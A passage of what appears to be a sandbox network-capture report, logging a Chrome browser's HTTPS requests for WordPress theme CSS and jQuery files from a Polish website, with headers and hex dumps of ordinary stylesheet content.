                                                            2025-01-15 10:07:56 UTC8000INData Raw: 0a 09 09 6f 70 61 63 69 74 79 3a 20 31 3b 0a 09 7d 0a 7d 0a 0a 0a 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 31 30 30 30 70 78 29 20 7b 0a 0a 09 2e 70 6f 72 74 66 6f 6c 69 6f 2d 69 74 65 6d 73 5b 64 61 74 61 2d 70 73 3d 22 36 22 5d 20 2e 77 6f 72 6b 2d 69 74 65 6d 3a 68 6f 76 65 72 20 2e 70 61 72 61 6c 6c 61 78 49 6d 67 2d 6c 61 79 65 72 73 20 3e 20 64 69 76 20 2e 62 67 2d 69 6d 67 3a 61 66 74 65 72 20 7b 0a 09 09 6f 70 61 63 69 74 79 3a 20 31 3b 0a 09 7d 20 0a 0a 0a 09 2e 70 6f 72 74 66 6f 6c 69 6f 2d 69 74 65 6d 73 5b 64 61 74 61 2d 70 73 3d 22 36 22 5d 20 2e 77 6f 72 6b 2d 69 74 65 6d 3a 68 6f 76 65 72 20 2e 77 6f 72 6b 2d 6d 65 74 61 20 2e 69 6e 6e 65 72 20 7b 0a 09 09 6f 70 61 63 69 74 79
                                                            Data Ascii: opacity: 1;}}@media only screen and (min-width: 1000px) {.portfolio-items[data-ps="6"] .work-item:hover .parallaxImg-layers > div .bg-img:after {opacity: 1;} .portfolio-items[data-ps="6"] .work-item:hover .work-meta .inner {opacity
                                                            2025-01-15 10:07:56 UTC4805INData Raw: 65 61 64 65 72 3d 22 74 72 75 65 22 5d 20 2e 70 6f 72 74 66 6f 6c 69 6f 2d 6c 6f 61 64 69 6e 67 20 7b 0a 09 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 7d 0a 0a 64 69 76 5b 64 61 74 61 2d 63 6f 6c 2d 6e 75 6d 3d 22 63 6f 6c 73 2d 34 22 5d 20 2e 70 6f 72 74 66 6f 6c 69 6f 2d 6c 6f 61 64 69 6e 67 20 7b 0a 09 74 6f 70 3a 20 38 35 70 78 3b 0a 7d 0a 0a 64 69 76 5b 64 61 74 61 2d 63 6f 6c 2d 6e 75 6d 3d 22 63 6f 6c 73 2d 33 22 5d 20 2e 70 6f 72 74 66 6f 6c 69 6f 2d 6c 6f 61 64 69 6e 67 20 7b 0a 09 74 6f 70 3a 20 31 31 31 70 78 3b 0a 7d 0a 0a 64 69 76 2e 70 6f 72 74 66 6f 6c 69 6f 2d 69 74 65 6d 73 5b 64 61 74 61 2d 63 6f 6c 2d 6e 75 6d 3d 22 65 6c 61 73 74 69 63 22 5d 20 7b 0a 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 30 70 78 21 69 6d 70 6f 72 74 61 6e 74
                                                            Data Ascii: eader="true"] .portfolio-loading {display: none;}div[data-col-num="cols-4"] .portfolio-loading {top: 85px;}div[data-col-num="cols-3"] .portfolio-loading {top: 111px;}div.portfolio-items[data-col-num="elastic"] {margin-right: 0px!important


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            13192.168.2.1649724178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:07:56 UTC607OUTGET /wp-content/themes/salient/css/ascend.css?ver=7.6 HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: text/css,*/*;q=0.1
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: style
                                                            Referer: https://canpol.poznan.pl/en/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:07:56 UTC279INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:07:56 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 11:54:59 GMT
                                                            ETag: "6b78-620a8e932052c"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 27512
                                                            Vary: Accept-Encoding
                                                            Content-Type: text/css
                                                            2025-01-15 10:07:56 UTC7913INData Raw: 2e 61 73 63 65 6e 64 20 2e 63 6f 6e 74 61 69 6e 65 72 2d 77 72 61 70 2c 20 2e 61 73 63 65 6e 64 20 2e 70 72 6f 6a 65 63 74 2d 74 69 74 6c 65 2c 20 62 6f 64 79 20 2e 76 63 5f 74 65 78 74 5f 73 65 70 61 72 61 74 6f 72 20 64 69 76 2c 20 2e 63 61 72 6f 75 73 65 6c 2d 77 72 61 70 5b 64 61 74 61 2d 66 75 6c 6c 2d 77 69 64 74 68 3d 22 74 72 75 65 22 5d 20 2e 63 61 72 6f 75 73 65 6c 2d 68 65 61 64 69 6e 67 2c 20 2e 63 61 72 6f 75 73 65 6c 2d 77 72 61 70 20 73 70 61 6e 2e 6c 65 66 74 2d 62 6f 72 64 65 72 2c 20 2e 63 61 72 6f 75 73 65 6c 2d 77 72 61 70 20 73 70 61 6e 2e 72 69 67 68 74 2d 62 6f 72 64 65 72 2c 0a 23 70 61 67 65 2d 68 65 61 64 65 72 2d 77 72 61 70 2c 20 2e 70 61 67 65 2d 68 65 61 64 65 72 2d 6e 6f 2d 62 67 2c 20 23 66 75 6c 6c 5f 77 69 64 74 68 5f 70
                                                            Data Ascii: .ascend .container-wrap, .ascend .project-title, body .vc_text_separator div, .carousel-wrap[data-full-width="true"] .carousel-heading, .carousel-wrap span.left-border, .carousel-wrap span.right-border,#page-header-wrap, .page-header-no-bg, #full_width_p
                                                            2025-01-15 10:07:56 UTC8000INData Raw: 6c 20 23 73 6f 63 69 61 6c 2d 69 6e 2d 6d 65 6e 75 20 7b 0a 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 31 33 70 78 3b 0a 7d 0a 0a 2e 61 73 63 65 6e 64 5b 64 61 74 61 2d 68 65 61 64 65 72 2d 73 65 61 72 63 68 3d 22 66 61 6c 73 65 22 5d 20 23 68 65 61 64 65 72 2d 6f 75 74 65 72 5b 64 61 74 61 2d 66 75 6c 6c 2d 77 69 64 74 68 3d 22 74 72 75 65 22 5d 5b 64 61 74 61 2d 63 61 72 74 3d 22 74 72 75 65 22 5d 20 68 65 61 64 65 72 23 74 6f 70 20 6e 61 76 20 75 6c 20 2e 73 6c 69 64 65 2d 6f 75 74 2d 77 69 64 67 65 74 2d 61 72 65 61 2d 74 6f 67 67 6c 65 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 30 32 70 78 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 7d 0a 0a 2e 61 73 63 65 6e 64 5b 64 61 74 61 2d 73 6c 69 64 65 2d 6f 75 74 2d 77 69 64 67 65 74 2d 61 72 65 61 3d
                                                            Data Ascii: l #social-in-menu {margin-right: 13px;}.ascend[data-header-search="false"] #header-outer[data-full-width="true"][data-cart="true"] header#top nav ul .slide-out-widget-area-toggle {margin-left: 102px!important;}.ascend[data-slide-out-widget-area=
                                                            2025-01-15 10:07:56 UTC8000INData Raw: 72 2d 62 69 6f 20 23 61 75 74 68 6f 72 2d 69 6e 66 6f 20 70 20 7b 0a 09 6d 61 78 2d 77 69 64 74 68 3a 20 37 30 25 3b 0a 09 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 7d 0a 0a 2e 61 73 63 65 6e 64 20 23 61 75 74 68 6f 72 2d 62 69 6f 20 2e 6e 65 63 74 61 72 2d 62 75 74 74 6f 6e 20 7b 0a 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 30 70 78 3b 0a 7d 0a 0a 2e 61 73 63 65 6e 64 20 23 61 75 74 68 6f 72 2d 62 69 6f 20 2e 61 76 61 74 61 72 20 7b 0a 09 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 31 30 30 25 3b 0a 7d 0a 0a 2e 61 73 63 65 6e 64 20 2e 63 6f 6d 6d 65 6e 74 2d 6c 69 73 74 20 7b 0a 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 7d 0a 0a 2e 61 73 63 65 6e 64 20 2e 63 6f 6d 6d 65 6e 74 2d 6c 69 73 74 20 2e 72
                                                            Data Ascii: r-bio #author-info p {max-width: 70%;margin: 0 auto;}.ascend #author-bio .nectar-button {margin-top: 20px;}.ascend #author-bio .avatar { border-radius: 100%;}.ascend .comment-list {margin-bottom: 0!important;}.ascend .comment-list .r
                                                            2025-01-15 10:07:56 UTC3599INData Raw: 66 74 3a 68 6f 76 65 72 3a 61 66 74 65 72 20 7b 0a 09 6f 70 61 63 69 74 79 3a 20 31 3b 0a 09 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 58 28 2d 35 31 70 78 29 3b 0a 09 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 58 28 2d 35 31 70 78 29 3b 0a 7d 0a 2e 6d 66 70 2d 61 72 72 6f 77 2d 6c 65 66 74 3a 68 6f 76 65 72 3a 61 66 74 65 72 20 7b 0a 09 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 58 28 2d 35 38 70 78 29 3b 0a 09 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 58 28 2d 35 38 70 78 29 3b 0a 7d 0a 2e 61 73 63 65 6e 64 20 61 2e 70 70 5f 61 72 72 6f 77 5f 70 72 65 76 69 6f 75 73 3a 68 6f 76 65 72 20 2e 69 63 6f 6e 2d 64 65 66 61 75 6c 74 2d 73 74 79
                                                            Data Ascii: ft:hover:after {opacity: 1;transform: translateX(-51px);-webkit-transform: translateX(-51px);}.mfp-arrow-left:hover:after {transform: translateX(-58px);-webkit-transform: translateX(-58px);}.ascend a.pp_arrow_previous:hover .icon-default-sty


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            14192.168.2.1649725178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:07:56 UTC639OUTGET /wp-content/plugins/js_composer_salient/assets/css/js_composer.min.css?ver=4.12.1 HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: text/css,*/*;q=0.1
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: style
                                                            Referer: https://canpol.poznan.pl/en/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:07:57 UTC281INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:07:56 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 11:55:45 GMT
                                                            ETag: "1a6b6-620a8ebfa87ab"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 108214
                                                            Vary: Accept-Encoding
                                                            Content-Type: text/css
                                                            2025-01-15 10:07:57 UTC7911INData Raw: 2e 74 68 75 6d 62 6e 61 69 6c 20 3e 20 69 6d 67 2c 0a 2e 74 68 75 6d 62 6e 61 69 6c 20 61 20 3e 20 69 6d 67 2c 0a 2e 63 61 72 6f 75 73 65 6c 2d 69 6e 6e 65 72 20 3e 20 2e 69 74 65 6d 20 3e 20 69 6d 67 2c 0a 2e 63 61 72 6f 75 73 65 6c 2d 69 6e 6e 65 72 20 3e 20 2e 69 74 65 6d 20 3e 20 61 20 3e 20 69 6d 67 20 7b 0a 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 68 65 69 67 68 74 3a 20 61 75 74 6f 3b 0a 7d 0a 2e 62 74 6e 2d 67 72 6f 75 70 2d 6c 67 20 3e 20 2e 62 74 6e 20 7b 0a 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 20 31 36 70 78 3b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0a 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 33 33 3b 0a 20 20 62 6f 72 64 65 72 2d 72
                                                            Data Ascii: .thumbnail > img,.thumbnail a > img,.carousel-inner > .item > img,.carousel-inner > .item > a > img { display: block; max-width: 100%; height: auto;}.btn-group-lg > .btn { padding: 10px 16px; font-size: 18px; line-height: 1.33; border-r
                                                            2025-01-15 10:07:57 UTC8000INData Raw: 63 6f 6c 2d 78 73 2d 70 75 6c 6c 2d 37 20 7b 0a 20 20 72 69 67 68 74 3a 20 35 37 2e 34 34 36 38 30 38 35 30 35 25 3b 0a 7d 0a 62 6f 64 79 20 2e 76 63 5f 72 6f 77 2d 66 6c 75 69 64 20 2e 76 63 5f 63 6f 6c 2d 78 73 2d 70 75 6c 6c 2d 36 20 7b 0a 20 20 72 69 67 68 74 3a 20 34 38 2e 39 33 36 31 37 30 32 30 37 39 39 39 39 39 25 3b 0a 7d 0a 62 6f 64 79 20 2e 76 63 5f 72 6f 77 2d 66 6c 75 69 64 20 2e 76 63 5f 63 6f 6c 2d 78 73 2d 70 75 6c 6c 2d 35 20 7b 0a 20 20 72 69 67 68 74 3a 20 34 30 2e 34 32 35 35 33 31 39 31 31 25 3b 0a 7d 0a 62 6f 64 79 20 2e 76 63 5f 72 6f 77 2d 66 6c 75 69 64 20 2e 76 63 5f 63 6f 6c 2d 78 73 2d 70 75 6c 6c 2d 34 20 7b 0a 20 20 72 69 67 68 74 3a 20 33 31 2e 39 31 34 38 39 33 36 31 34 25 3b 0a 7d 0a 62 6f 64 79 20 2e 76 63 5f 72 6f 77 2d
                                                            Data Ascii: col-xs-pull-7 { right: 57.446808505%;}body .vc_row-fluid .vc_col-xs-pull-6 { right: 48.93617020799999%;}body .vc_row-fluid .vc_col-xs-pull-5 { right: 40.425531911%;}body .vc_row-fluid .vc_col-xs-pull-4 { right: 31.914893614%;}body .vc_row-
                                                            2025-01-15 10:07:57 UTC8000INData Raw: 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 34 38 2e 39 33 36 31 37 30 32 30 37 39 39 39 39 39 25 3b 0a 20 20 7d 0a 20 20 62 6f 64 79 20 2e 76 63 5f 72 6f 77 2d 66 6c 75 69 64 20 2e 76 63 5f 63 6f 6c 2d 73 6d 2d 6f 66 66 73 65 74 2d 35 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 34 30 2e 34 32 35 35 33 31 39 31 31 25 3b 0a 20 20 7d 0a 20 62 6f 64 79 20 2e 76 63 5f 72 6f 77 2d 66 6c 75 69 64 20 20 2e 76 63 5f 63 6f 6c 2d 73 6d 2d 6f 66 66 73 65 74 2d 34 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 33 31 2e 39 31 34 38 39 33 36 31 34 25 3b 0a 20 20 7d 0a 20 20 62 6f 64 79 20 2e 76 63 5f 72 6f 77 2d 66 6c 75 69 64 20 2e 76 63 5f 63 6f 6c 2d 73 6d 2d 6f 66 66 73 65 74 2d 33 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74
                                                            Data Ascii: margin-left: 48.93617020799999%; } body .vc_row-fluid .vc_col-sm-offset-5 { margin-left: 40.425531911%; } body .vc_row-fluid .vc_col-sm-offset-4 { margin-left: 31.914893614%; } body .vc_row-fluid .vc_col-sm-offset-3 { margin-left
                                                            2025-01-15 10:07:57 UTC8000INData Raw: 77 2d 66 6c 75 69 64 20 2e 76 63 5f 63 6f 6c 2d 6c 67 2d 6f 66 66 73 65 74 2d 33 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 32 33 2e 34 30 34 32 35 35 33 31 37 25 3b 0a 20 20 7d 0a 20 20 62 6f 64 79 20 2e 76 63 5f 72 6f 77 2d 66 6c 75 69 64 20 2e 76 63 5f 63 6f 6c 2d 6c 67 2d 6f 66 66 73 65 74 2d 32 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 34 2e 38 39 33 36 31 37 30 32 25 3b 0a 20 20 7d 0a 20 20 62 6f 64 79 20 2e 76 63 5f 72 6f 77 2d 66 6c 75 69 64 20 2e 76 63 5f 63 6f 6c 2d 6c 67 2d 6f 66 66 73 65 74 2d 31 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 36 2e 33 38 32 39 37 38 37 32 33 25 3b 0a 20 20 7d 0a 20 20 62 6f 64 79 20 2e 76 63 5f 72 6f 77 2d 66 6c 75 69 64 20 2e 76 63 5f 63 6f 6c 2d 6c 67 2d 6f
                                                            Data Ascii: w-fluid .vc_col-lg-offset-3 { margin-left: 23.404255317%; } body .vc_row-fluid .vc_col-lg-offset-2 { margin-left: 14.89361702%; } body .vc_row-fluid .vc_col-lg-offset-1 { margin-left: 6.382978723%; } body .vc_row-fluid .vc_col-lg-o
                                                            2025-01-15 10:07:57 UTC8000INData Raw: 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 35 70 78 3b 0a 7d 0a 2e 76 63 5f 62 74 6e 2d 62 6c 61 63 6b 20 7b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 61 32 61 32 61 3b 0a 20 20 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 20 61 6c 6c 20 30 2e 35 73 3b 0a 20 20 2d 6f 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 20 61 6c 6c 20 30 2e 35 73 3b 0a 20 20 74 72 61 6e 73 69 74 69 6f 6e 3a 20 61 6c 6c 20 30 2e 35 73 3b 0a 7d 0a 2e 76 63 5f 62 74 6e 2d 62 6c 61 63 6b 3a 68 6f 76 65 72 20 7b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 31 62 31 62 31 62 3b 0a 20 20 63 6f 6c 6f 72 3a 20 23 66 37 66 37 66 37 20 21 69 6d 70 6f 72
                                                            Data Ascii: margin-bottom: 5px;}.vc_btn-black { background-color: #2a2a2a; color: #ffffff !important; -webkit-transition: all 0.5s; -o-transition: all 0.5s; transition: all 0.5s;}.vc_btn-black:hover { background-color: #1b1b1b; color: #f7f7f7 !impor
                                                            2025-01-15 10:07:57 UTC8000INData Raw: 2c 0a 6f 70 74 69 6f 6e 2e 77 70 62 5f 61 64 64 72 65 73 73 5f 62 6f 6f 6b 20 7b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 2e 2e 2f 69 6d 61 67 65 73 2f 69 63 6f 6e 73 2f 61 64 64 72 65 73 73 2d 62 6f 6f 6b 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 72 69 67 68 74 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 77 70 62 5f 61 6c 61 72 6d 5f 63 6c 6f 63 6b 20 69 2e 69 63 6f 6e 2c 0a 6f 70 74 69 6f 6e 2e 77 70 62 5f 61 6c 61 72 6d 5f 63 6c 6f 63 6b 20 7b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 2e 2e 2f 69 6d 61 67 65 73 2f 69 63 6f 6e 73 2f 61 6c 61 72 6d 2d 63 6c 6f 63 6b 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 72 69 67 68 74 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 77 70 62 5f 61 6e 63 68 6f 72 20 69 2e 69 63 6f 6e 2c 0a 6f 70
                                                            Data Ascii: ,option.wpb_address_book { background: url(../images/icons/address-book.png) no-repeat right center;}.wpb_alarm_clock i.icon,option.wpb_alarm_clock { background: url(../images/icons/alarm-clock.png) no-repeat right center;}.wpb_anchor i.icon,op
                                                            2025-01-15 10:07:57 UTC8000INData Raw: 20 20 7a 2d 69 6e 64 65 78 3a 20 30 3b 0a 20 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 0a 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 7d 0a 2e 76 63 5f 62 6f 78 5f 73 68 61 64 6f 77 5f 33 64 5f 77 72 61 70 3a 61 66 74 65 72 2c 0a 2e 76 63 5f 62 6f 78 5f 73 68 61 64 6f 77 5f 33 64 5f 77 72 61 70 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 22 3b 0a 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 35 70 78 20 31 30 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 35 29 3b 0a 20 20 6c 65 66 74 3a 20 31 30 70 78 3b 0a 20 20 62 6f 74 74 6f 6d 3a 20 38 25 3b 0a 20 20 77 69 64 74 68 3a 20 34 30 25 3b 0a 20 20 68 65 69 67 68 74
                                                            Data Ascii: z-index: 0; display: inline-block; max-width: 100%;}.vc_box_shadow_3d_wrap:after,.vc_box_shadow_3d_wrap:before { content: ""; position: absolute; box-shadow: 0 15px 10px rgba(0, 0, 0, 0.5); left: 10px; bottom: 8%; width: 40%; height
                                                            2025-01-15 10:07:57 UTC8000INData Raw: 65 61 65 61 65 61 3b 0a 7d 0a 2e 77 70 62 5f 62 75 74 74 6f 6e 3a 61 63 74 69 76 65 2c 0a 2e 77 70 62 5f 62 75 74 74 6f 6e 2e 61 63 74 69 76 65 20 7b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 64 31 64 31 64 31 20 5c 39 3b 0a 7d 0a 2e 77 70 62 5f 62 75 74 74 6f 6e 3a 66 69 72 73 74 2d 63 68 69 6c 64 20 7b 0a 20 20 2a 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 30 3b 0a 7d 0a 2e 76 63 5f 76 63 5f 62 75 74 74 6f 6e 32 20 2e 76 63 5f 62 74 6e 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 35 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 35 70 78 3b 0a 7d 0a 2e 76 63 5f 76 63 5f 62 75 74 74 6f 6e 20 2e 76 63 5f 62 74 6e 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 35 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74
                                                            Data Ascii: eaeaea;}.wpb_button:active,.wpb_button.active { background-color: #d1d1d1 \9;}.wpb_button:first-child { *margin-left: 0;}.vc_vc_button2 .vc_btn { margin-top: 5px; margin-bottom: 5px;}.vc_vc_button .vc_btn { margin-top: 5px; margin-bot
                                                            2025-01-15 10:07:57 UTC8000INData Raw: 6e 67 3a 20 30 3b 0a 7d 0a 2e 77 70 62 5f 63 6f 6e 74 65 6e 74 5f 65 6c 65 6d 65 6e 74 20 2e 77 70 62 5f 74 61 62 73 5f 6e 61 76 20 7b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 74 65 78 74 2d 69 6e 64 65 6e 74 3a 20 69 6e 68 65 72 69 74 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 7d 0a 23 63 6f 6e 74 65 6e 74 20 2e 77 70 62 5f 63 6f 6e 74 65 6e 74 5f 65 6c 65 6d 65 6e 74 20 2e 77 70 62 5f 74 61 62 73 5f 6e 61 76 20 7b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 7d 0a 2e 77 70 62 5f 63 6f 6e 74 65 6e 74 5f 65 6c 65 6d 65 6e 74 20 2e 77 70 62 5f 74 61 62 73 5f 6e 61 76 20 6c 69 20 7b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b
                                                            Data Ascii: ng: 0;}.wpb_content_element .wpb_tabs_nav { margin: 0; padding-left: 0 !important; text-indent: inherit !important;}#content .wpb_content_element .wpb_tabs_nav { margin: 0;}.wpb_content_element .wpb_tabs_nav li { background-color: #ffffff;
                                                            2025-01-15 10:07:57 UTC8000INData Raw: 70 61 64 64 69 6e 67 3a 20 31 30 70 78 20 30 20 33 70 78 20 30 3b 0a 7d 0a 2e 77 70 62 5f 67 61 6c 6c 65 72 79 20 2e 77 70 62 5f 66 6c 65 78 73 6c 69 64 65 72 20 2e 66 6c 65 78 2d 63 6f 6e 74 72 6f 6c 2d 6e 61 76 20 7b 0a 20 20 62 6f 74 74 6f 6d 3a 20 2d 33 35 70 78 3b 0a 7d 0a 2e 77 70 62 5f 67 61 6c 6c 65 72 79 20 2e 77 70 62 5f 66 6c 65 78 73 6c 69 64 65 72 20 2e 66 6c 65 78 2d 63 61 70 74 69 6f 6e 20 7b 0a 20 20 63 75 72 73 6f 72 3a 20 64 65 66 61 75 6c 74 3b 0a 7d 0a 2e 77 70 62 5f 67 61 6c 6c 65 72 79 20 2e 77 70 62 5f 66 6c 65 78 73 6c 69 64 65 72 20 2e 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 2d 6e 61 76 20 61 3a 62 65 66 6f 72 65 20 7b 0a 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 3b 0a 7d 0a 2e 77 70 62 5f 67 61 6c 6c 65 72 79 20 2e 77 70
                                                            Data Ascii: padding: 10px 0 3px 0;}.wpb_gallery .wpb_flexslider .flex-control-nav { bottom: -35px;}.wpb_gallery .wpb_flexslider .flex-caption { cursor: default;}.wpb_gallery .wpb_flexslider .flex-direction-nav a:before { line-height: 1;}.wpb_gallery .wp


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            15192.168.2.1649726178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:07:56 UTC590OUTGET /wp-includes/js/jquery/jquery.min.js?ver=3.6.0 HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: */*
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: script
                                                            Referer: https://canpol.poznan.pl/en/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:07:57 UTC287INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:07:57 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 12:15:01 GMT
                                                            ETag: "15db1-620a930e1dfa1"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 89521
                                                            Vary: Accept-Encoding
                                                            Content-Type: text/javascript
